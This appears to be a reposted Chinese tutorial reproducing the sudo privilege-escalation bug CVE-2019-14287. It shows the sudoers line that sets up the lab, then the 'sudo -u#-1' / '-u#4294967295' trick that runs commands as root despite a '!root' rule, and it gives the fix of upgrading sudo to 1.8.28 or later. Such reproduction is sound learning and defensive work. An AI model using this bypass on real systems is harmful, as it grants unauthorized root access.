sudo 提權漏洞(CVE-2019-14287)復現


(該文參考網絡他人資料,僅為學習,不許用於非法用途)

一、環境

  1、sudo版本小於1.8.28的Linux系統

  2、sudo 是Linux系統命令,讓普通賬號以root身份去執行某些命令,比如:安裝軟件、查看某些配置文件、關機、重啟等操作、如果普通用戶需要使用sudo,需要將修改配置文件/etc/sudoers,將sudo使用權賦予該賬號

  sudo 提權漏洞是一個安全策略繞過問題,去執行某些敏感的命令,CVE編號是CVE-2019-14287,影響版本小於1.8.28

二、漏洞復現過程

  Step1:查看版本

    sudo -V    

   Step2:修改配置文件

    vim /etc/sudoers

    在root ALL=(ALL:ALL) ALL   下面添加一行配置:test ALL=(ALL,!root) ALL

    注意:需創建test用戶:useradd test   passwd test ,修改完配置文件保存退出::wq!

      rest   表示test用戶

      第一個ALL   表示用戶可以在任意地方使用sudo

      第二個(ALL,!root)   表示命令可以被除了root以外的任意用戶執行

      最后面的ALL   表示被允許執行

      整體: test用戶可以使用sudo,但是除了root以外的任意用戶去執行命令

  Step:切換到test用戶  

    su test
  sudo id(查看root的id)

    發現沒有權限去執行

    使用如下方法執行我們想要執行的命令

      sudo -u# 數字 命令

      其中數字范圍:-1~4294967295,命令是系統命令

    如果以root身份去執行命令,數字使用-1和4294967295

三、修復方法

  更新sudo版本大於等於1.8.28

四、總結

  該漏洞比較雞肋,需要管理員修改配置文件。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM